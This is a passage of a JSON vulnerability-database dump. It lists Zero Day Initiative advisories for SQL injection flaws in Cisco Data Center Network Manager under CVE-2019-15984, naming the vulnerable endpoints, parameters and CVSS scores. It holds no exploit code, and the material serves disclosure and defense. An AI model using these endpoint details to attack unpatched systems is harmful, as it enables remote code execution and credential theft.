"cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-063", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-063/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:08", "description": "This vulnerability allows remote attackers to execute arbitrary code on 
affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getNpvLinkStatJoinDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getNpvLinkStatJoinList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-090", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-090/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:27", "description": "This vulnerability allows remote attackers to 
execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/imagemanagement/jobs service. When parsing the fabricName parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getJobList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-058", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-058/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:50", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/smartLicensing/getTokenInfo endpoint. When parsing the virtualAcc parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getTokenInfo SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-017", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-017/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:58", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the jobs endpoint. When parsing the filterStr parameter in the getJobLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getJobLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-107", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-107/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:35", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/SanGigEStat endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanGigEStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-043", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-043/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:44", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data 
Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/config/archive/jobs/execution endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getJobExecutionDetails SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-028", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-028/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:45", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center 
Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/devicemodule/deviceList endpoint. When parsing the serverId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager DeviceModuleRest getDeviceModulesupport SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-027", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-027/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center 
Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topology/switches/otv/feature service. When parsing the group-id parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDiscoveredDeviceCount groupId SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-099", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-099/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:31", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center 
Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getModulesBySwitch service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getModulesBySwitch SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-050", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-050/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/switches service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitches SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-052", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-052/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:00", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. 
Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of requests to the getSwitchsDataLength endpoint of the DbInventoryWS service. When parsing the colFilterStr parameter in the getSanSwitchDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanSwitchDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-104", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-104/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network 
Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS method. When parsing the item parameter of the getStorageEnclListForHosts endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVsanListForEnclosures SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-057", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-057/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of 
Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getPortGroupStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getPortGroupStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-078/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:48", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of DELETE requests to the fm/fmrest/virtualportchannel/vpcwizard/history endpoint. When parsing the jobId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager deleteVpcHistory SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-020/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:54", "description": "This vulnerability allows remote attackers to disclose sensitive information on 
affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getjobs endpoint. When parsing the filterStr parameter in the getRpmJobLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getRpmJobLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-112", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-112/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:29", "description": "This vulnerability allows remote attackers to execute arbitrary 
code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getEndDeviceList endpoint of the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndDeviceList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": 